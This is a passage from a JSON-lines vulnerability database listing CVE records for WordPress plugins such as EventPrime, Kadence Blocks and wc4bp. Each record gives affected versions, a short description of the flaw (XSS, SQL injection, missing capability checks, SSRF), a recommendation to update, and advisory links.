version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa977e6c-6b9d-4fa8-99f3-566d6a71424f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/fa977e6c-6b9d-4fa8-99f3-566d6a71424f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/terms-descriptions\\\/trunk\\\/includes\\\/td_admin_terms.php#L520\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/terms-descriptions\\\/trunk\\\/includes\\\/td_admin_terms.php#L520\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2572","slug":"survey-maker","versionEndExcluding":"3.4.7","description":"The Survey Maker WordPress plugin before 3.4.7 does not escape some parameters before outputting them back in attributes, leading to Reflected Cross-Site Scripting which could be used against high privilege users such as admin","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f7fe6e6-c3d0-4e27-8222-572d7a420153\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/2f7fe6e6-c3d0-4e27-8222-572d7a420153\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6836","slug":"funnel-builder","versionImpact":"3.4.6","versionEndExcluding":"3.4.7","description":"The Funnel Builder for WordPress by FunnelKit \u2013 Customize WooCommerce Checkout Pages, Create Sales Funnels, Order Bumps & One Click Upsells plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on multiple functions in all versions up to, and including, 3.4.6. This makes it possible for authenticated attackers, with Contributor-level access and above, to update multiple settings, including templates, designs, checkouts, and other plugin settings.","recommendation":"Update to version 3.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9022afe-0c79-413b-ac0a-a1d32ec09619?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d9022afe-0c79-413b-ac0a-a1d32ec09619?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/trunk\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-ajax-controller.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/funnel-builder\\\/trunk\\\/modules\\\/checkouts\\\/includes\\\/class-wfacp-ajax-controller.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123202\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3123202\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1986","slug":"gutentor","versionImpact":"3.4.6","versionEndExcluding":"3.4.7","description":"The Gutentor WordPress plugin before 3.4.7 does not sanitize and escape a parameter before using it in a SQL statement, allowing admins to perform SQL injection attacks","recommendation":"Update to version 3.4.7, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1414750-19ee-4a5d-b255-a9c20168b716\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/f1414750-19ee-4a5d-b255-a9c20168b716\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4546","slug":"custom-post-type-pdf-attachment","versionImpact":"3.4.5","versionEndExcluding":"3.4.6","description":"The Custom Post Type Attachment plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'pdf_attachment' shortcode in all versions up to, and including, 3.4.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.6, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6ba2907-36f4-4c4d-9e25-d13d32e28690?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6ba2907-36f4-4c4d-9e25-d13d32e28690?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087121\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3087121\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0979","slug":"dashboard-widgets-suite","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The Dashboard Widgets Suite plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 3.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe4d99c-9cbd-4255-8f90-f904313d46b4?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/cfe4d99c-9cbd-4255-8f90-f904313d46b4?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3101348%40dashboard-widgets-suite&new=3101348%40dashboard-widgets-suite&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3101348%40dashboard-widgets-suite&new=3101348%40dashboard-widgets-suite&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6553","slug":"wp-meteor","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The WP Meteor Website Speed Optimization Addon plugin for WordPress is vulnerable to Full Path Disclosure in all versions up to, and including, 3.4.3. This is due to the plugin utilizing wpdesk and leaving test files with display_errors on. This makes it possible for unauthenticated attackers to retrieve the full path of the web application, which can be used to aid other attacks. The information displayed is not useful on its own, and requires another vulnerability to be present for damage to an affected website.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6197c194-5a17-41da-be79-58a6f5c68a0b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6197c194-5a17-41da-be79-58a6f5c68a0b?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117899%40wp-meteor&new=3117899%40wp-meteor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3117899%40wp-meteor&new=3117899%40wp-meteor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1320","slug":"eventprime-event-calendar-management","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'offline_status' parameter in all versions up to, and including, 3.4.3 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e82e1c5-0ed4-4dee-9990-976591693eb5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/7e82e1c5-0ed4-4dee-9990-976591693eb5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1125","slug":"eventprime-event-calendar-management","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized loss of data due to a missing capability check on the calendar_events_delete() function in all versions up to, and including, 3.4.3. This makes it possible for authenticated attackers, with subscriber-level access and above, to delete arbitrary posts.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5278afb-9db3-4b1d-bb2f-e6595f0ac6dc?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b5278afb-9db3-4b1d-bb2f-e6595f0ac6dc?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1124","slug":"eventprime-event-calendar-management","versionImpact":"3.4.3","versionEndExcluding":"3.4.4","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized email sending due to a missing capability check on the ep_send_attendees_email() function in all versions up to, and including, 3.4.1. This makes it possible for authenticated attackers, with subscriber-level access and above, to send arbitrary emails with arbitrary content from the site.","recommendation":"Update to version 3.4.4, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/346049ca-1bc5-4e02-9f38-d1f64338709d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/346049ca-1bc5-4e02-9f38-d1f64338709d?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3043888%40eventprime-event-calendar-management&new=3043888%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12304","slug":"kadence-blocks","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The Gutenberg Blocks with AI by Kadence WP \u2013 Page Builder Features plugin for WordPress is vulnerable to Stored Cross-Site Scripting via button block link in all versions up to, and including, 3.4.2 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212269\\\/kadence-blocks\\\/tags\\\/3.4.3\\\/includes\\\/blocks\\\/class-kadence-blocks-singlebtn-block.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3212269\\\/kadence-blocks\\\/tags\\\/3.4.3\\\/includes\\\/blocks\\\/class-kadence-blocks-singlebtn-block.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c300c485-e5ab-48b3-99e8-0def5668ef4a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c300c485-e5ab-48b3-99e8-0def5668ef4a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1321","slug":"eventprime-event-calendar-management","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to payment bypass in all versions up to, and including, 3.4.2. This is due to the plugin allowing unauthenticated users to update the status of order payments. This makes it possible for unauthenticated attackers to book events for free.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/765d0933-8db2-471c-ad4e-e19d3b4ff015?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/765d0933-8db2-471c-ad4e-e19d3b4ff015?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4933","slug":"wp-job-openings","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The WP Job Openings WordPress plugin before 3.4.3 does not block listing the contents of the directories where it stores attachments to job applications, allowing unauthenticated visitors to list and download private attachments if the autoindex feature of the web server is enabled.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/882f6c36-44c6-4273-81cd-2eaaf5e81fa7\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/882f6c36-44c6-4273-81cd-2eaaf5e81fa7\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5877","slug":"affiliate-toolkit-starter","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The affiliate-toolkit WordPress plugin before 3.4.3 lacks authorization and authentication for requests to its affiliate-toolkit-starter\/tools\/atkp_imagereceiver.php endpoint, allowing unauthenticated visitors to make requests to arbitrary URLs, including RFC1918 private addresses, leading to a Server Side Request Forgery (SSRF) issue.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39ed4934-3d91-4924-8acc-25759fef9e81\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/39ed4934-3d91-4924-8acc-25759fef9e81\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36758","slug":"feedzy-rss-feeds","versionEndExcluding":"3.4.3","description":"The RSS Aggregator by Feedzy plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 3.4.2. This is due to missing or incorrect nonce validation on the save_feedzy_post_type_meta() function. This makes it possible for unauthenticated attackers to update post meta via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2369394\\\/feedzy-rss-feeds\\\/trunk\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2369394\\\/feedzy-rss-feeds\\\/trunk\\\/includes\\\/admin\\\/feedzy-rss-feeds-admin.php\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-4\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-3\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-2\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-1\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/more-wordpress-plugins-and-themes-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/25-wordpress-plugins-vulnerable-to-csrf-attacks\\\/\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3b916dc-3b94-4319-a805-0ea99d14429f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e3b916dc-3b94-4319-a805-0ea99d14429f?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"name\":\"https:\\\/\\\/blog.nintechnet.com\\\/multiple-wordpress-plugins-fixed-csrf-vulnerabilities-part-5\\\/\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8549","slug":"google-calendar-events","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The Simple Calendar \u2013 Google Calendar Plugin plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of add_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.2. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17ae3f22-6426-48f7-93e6-c0ad515b329a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/17ae3f22-6426-48f7-93e6-c0ad515b329a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3156894%40google-calendar-events&new=3156894%40google-calendar-events&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3156894%40google-calendar-events&new=3156894%40google-calendar-events&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156894\\\/google-calendar-events\\\/trunk\\\/includes\\\/admin\\\/notices.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3156894\\\/google-calendar-events\\\/trunk\\\/includes\\\/admin\\\/notices.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-1123","slug":"eventprime-event-calendar-management","versionImpact":"3.4.2","versionEndExcluding":"3.4.3","description":"The EventPrime \u2013 Events Calendar, Bookings and Tickets plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the save_frontend_event_submission() function in all versions up to, and including, 3.4.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite the title and content of arbitrary posts. This can also be exploited by unauthenticated attackers when the allow_submission_by_anonymous_user setting is enabled.","recommendation":"Update to version 3.4.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/351926d4-a9be-4fbd-bdf2-8bbff41d97ef?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/351926d4-a9be-4fbd-bdf2-8bbff41d97ef?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3033882%40eventprime-event-calendar-management&new=3033882%40eventprime-event-calendar-management&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1780","slug":"wc4bp","versionImpact":"3.4.25","versionEndExcluding":"3.4.26","description":"The BuddyPress WooCommerce My Account Integration. Create WooCommerce Member Pages plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wc4bp_delete_page() function in all versions up to, and including, 3.4.25. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins page setting.","recommendation":"Update to version 3.4.26, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248127%40wc4bp&new=3248127%40wc4bp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3248127%40wc4bp&new=3248127%40wc4bp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc138cbb-2713-4b0a-8e3a-8e1a9266637f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/dc138cbb-2713-4b0a-8e3a-8e1a9266637f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13358","slug":"wc4bp","versionImpact":"3.4.24","versionEndExcluding":"3.4.25","description":"The BuddyPress WooCommerce My Account Integration. Create WooCommerce Member Pages plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on the wc4bp_delete_page() function in all versions up to, and including, 3.4.24. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update the plugins page setting.","recommendation":"Update to version 3.4.25, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244145%40wc4bp&new=3244145%40wc4bp&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3244145%40wc4bp&new=3244145%40wc4bp&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f526f3c-4e9b-4440-b3c3-8541c1be0ba0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f526f3c-4e9b-4440-b3c3-8541c1be0ba0?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6360","slug":"my-calendar","versionEndExcluding":"3.4.22","description":"The 'My Calendar' WordPress Plugin, version < 3.4.22 is affected by an unauthenticated SQL injection vulnerability in the 'from' and 'to' parameters in the '\/my-calendar\/v1\/events' rest route.","refs":"[{\"url\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-40\",\"name\":\"https:\\\/\\\/www.tenable.com\\\/security\\\/research\\\/tra-2023-40\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9371","slug":"branda-white-labeling","versionImpact":"3.4.21","versionEndExcluding":"3.4.22","description":"The Branda \u2013 White Label & Branding, Custom Login Page Customizer plugin for WordPress is vulnerable to Reflected Cross-Site Scripting due to the use of remove_query_arg without appropriate escaping on the URL in all versions up to, and including, 3.4.19. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 3.4.22, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/tags\\\/3.4.19\\\/inc\\\/class-branda-admin.php#L1871\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/branda-white-labeling\\\/tags\\\/3.4.19\\\/inc\\\/class-branda-admin.php#L1871\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3191895%40branda-white-labeling&new=3191895%40branda-white-labeling&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3191895%40branda-white-labeling&new=3191895%40branda-white-labeling&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb60e5c8-cbda-4488-816c-a7fdf2b39fd6?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/eb60e5c8-cbda-4488-816c-a7fdf2b39fd6?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2025","slug":"wc4bp","versionImpact":"3.4.20","versionEndExcluding":"3.4.21","description":"The \"BuddyPress WooCommerce My Account Integration. Create WooCommerce Member Pages\" plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.4.20 via deserialization of untrusted input in the get_simple_request function. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject a PHP Object. If a POP chain is present via an additional plugin or theme installed on the target system, it could allow the attacker to delete arbitrary files, retrieve sensitive data, or execute code.","recommendation":"Update to version 3.4.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78da9e79-399e-43e3-ac27-a162861cae71?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/78da9e79-399e-43e3-ac27-a162861cae71?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055634\\\/wc4bp\\\/trunk\\\/class\\\/includes\\\/class-request-helper.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3055634\\\/wc4bp\\\/trunk\\\/class\\\/includes\\\/class-request-helper.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-6222","slug":"quttera-web-malware-scanner","versionImpact":"3.4.1.48","versionEndExcluding":"3.4.2.1","description":"The Quttera Web Malware Scanner WordPress plugin before 3.4.2.1 does not validate user input used in a path, which could allow users with an admin role to perform path traversal attacks","recommendation":"Update to version 3.4.2.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df892e99-c0f6-42b8-a834-fc55d1bde130\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/df892e99-c0f6-42b8-a834-fc55d1bde130\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1krgHH2NvVFr93VpErLkOjDV3L6M5yIA1\\\/view?usp=sharing\",\"name\":\"https:\\\/\\\/drive.google.com\\\/file\\\/d\\\/1krgHH2NvVFr93VpErLkOjDV3L6M5yIA1\\\/view?usp=sharing\",\"refsource\":\"\",\"tags\":[]}]"}
